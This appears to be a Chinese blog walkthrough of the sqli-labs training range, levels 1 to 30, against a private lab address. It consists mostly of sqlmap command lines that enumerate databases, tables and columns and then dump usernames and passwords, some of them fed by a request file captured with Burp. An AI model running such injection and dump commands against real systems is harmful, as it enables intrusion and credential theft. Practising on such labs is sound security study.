sqli靶场1到30关

sqli1到9关爆破
因为步骤都是一样的,我只演示第一关

  1. 爆出数据库名
  • python sqlmap.py -u http://192.168.188.10/sqli/Less-1/?id=1 --technique UE --dbms mysql --batch --dbs
    sqli靶场1到30关_第1张图片
  1. 爆表名
  • python sqlmap.py -u http://192.168.188.10/sqli/Less-1/?id=1 --technique UE --dbms mysql -D security --tables --batch
    sqli靶场1到30关_第2张图片
  1. 爆字段名
  • python sqlmap.py -u http://192.168.188.10/sqli/Less-1/?id=1 --technique UE --dbms mysql -D security -T users --columns --batch
    sqli靶场1到30关_第3张图片
  1. 爆用户信息
  • python sqlmap.py -u http://192.168.188.10/sqli/Less-1/?id=1 --technique UE --dbms mysql -D security -T users -C username,password --dump --batch
  • sqli靶场1到30关_第4张图片
  1. 没了

sqli10关爆破
第十关与之前的区别是需要设置风险级别以及测试级别

  1. 爆破数据库
  • python sqlmap.py -u http://192.168.188.10/sqli/Less-10/?id=i --dbs --batch --level=5 --risk=3
    sqli靶场1到30关_第5张图片
  1. 爆表名
  • python sqlmap.py -u http://192.168.188.10/sqli/Less-10/?id=i -D security --tables --batch --level=5 --risk=3
    sqli靶场1到30关_第6张图片
  1. 爆字段名
  • python sqlmap.py -u http://192.168.188.10/sqli/Less-10/?id=i -D security -T users --columns --batch --level=5 --risk=3
    sqli靶场1到30关_第7张图片
  1. 爆用户信息
  • python sqlmap.py -u http://192.168.188.10/sqli/Less-10/?id=i -D security -T users -C username,password --dump --batch --level=5 --risk=3

sqli靶场1到30关_第8张图片

  1. 没了

sqli11到19关爆破
因为步骤都是一样的,我只演示第十一关

  1. 使用BURP保存数据包到本地,命名为11.txt
  2. 爆破数据库
  • python sqlmap.py -r “C:\Users\User\Desktop\11.txt” --technique UE --dbms mysql --batch --dbs
    sqli靶场1到30关_第9张图片
  1. 爆表名
  • python sqlmap.py -r “C:\Users\User\Desktop\11.txt” --technique UE --dbms mysql -D security --tables --batch
    sqli靶场1到30关_第10张图片
  1. 爆字段名
  • python sqlmap.py -r “C:\Users\User\Desktop\11.txt” --technique UE --dbms mysql -D security -T users --columns --batch
    sqli靶场1到30关_第11张图片
  1. 爆用户信息
  • python sqlmap.py -r “C:\Users\User\Desktop\11.txt” --technique UE --dbms mysql -D security -T users -C username,password --dump --batch
    sqli靶场1到30关_第12张图片
  1. 没了
    sqli20到30关爆破
    与上面一样只是后面加个风险等级以及测试等级就行
    就是加--level=5 --risk=3

你可能感兴趣的:(#,靶场,安全,web安全)